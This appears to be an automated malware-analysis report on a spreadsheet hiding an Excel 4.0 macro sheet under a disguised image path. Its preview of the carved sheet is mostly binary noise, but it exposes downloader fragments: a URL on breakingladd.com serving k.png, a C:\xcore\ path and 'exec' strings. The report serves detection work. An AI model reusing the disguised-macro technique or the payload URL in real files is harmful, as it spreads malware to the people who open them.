MALICIOUS
120
Risk Score
Heuristics 2
-
Excel 4.0 macro sheet (1 sheet(s)) critical 1 related finding OOXML_XLM_MACROSHEETSpreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
-
Excel 4.0 macro sheet stored under disguised package path critical OOXML_XLM_DISGUISED_RELATIONSHIPOOXML package declares an xlMacrosheet relationship whose target is outside the canonical xl/macrosheets/ path. Excel follows the relationship type, while path-only scanners can miss the macro execution surface.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_sheet_00.xml |
xlm-macrosheet | OOXML XLM macro sheet: xl/encrypt/image1.png | 3454 bytes |
SHA-256: 0997ece270d9a8f312675c2e372d1ad9649e9159c7bc1ee35d63758472b53fe4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
� � � @ �������� � � � � � @ d � $ � � % �� & � � � < �? � � � % �� & � 0 d f v f f d f f d h j f d h j f e j t h j h t j h t g r h j t g r h j t g r h j t g r h j g t r m 0 d f v f f d f f d h j f d h j f e j t h j h t j h t g r h j t g r h j t g r h j t g r h j g t r f s A0 % �� & � % �� & } % �� & ~ A &�� ' D} �D~ �D �D� � B � % �� & - # $� � B � % �� & � E + # D� �D� � D� � D� � B � % �� & � � ���<�� g D� �D� � D� � D� � D� �D� � D� � D� � D� � D� � D� �D� � B � 6 e x p l e x p l B P % �� & � n T # $� �D� �D� � D� � D� � D� � D� � D� � $� � B � 6 o r e r o r e r B P % �� & � Y ������ ? D� �D� �D� � D� � D� � D� �D� � B � Y C : \ x c o r e \ 1 C : \ x c o r e \ B P % �� & � r E@ X # D� �D� � D� �D� � D� � D� � D� � D� � D� � B � 6 d e f e d e f e B P % �� & � � h t t p : / / b r e a k i n g l a d d . c o m / k . p n g G h t t p : / / b r e a k i n g l a d d . c o m / D� � . p n g ( o a o a B P % �� & �
/ m a \ m a \ B P % �� & � = e x e c t e x e c t B P % �� & � �? % �� & �
% �� & �
B 6 % �� & � % �� & � % �� & � U U % �� & � % �� & � % �� & � % �� & � % �� & � % �� & � % �� & � 3 H/ A p A TX$AA� % �� & � % �� & ` % �� & � � � B � � 0ffffff�?ffffff�? �? �?333333�?333333�?� . d , , r I d 2 �
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.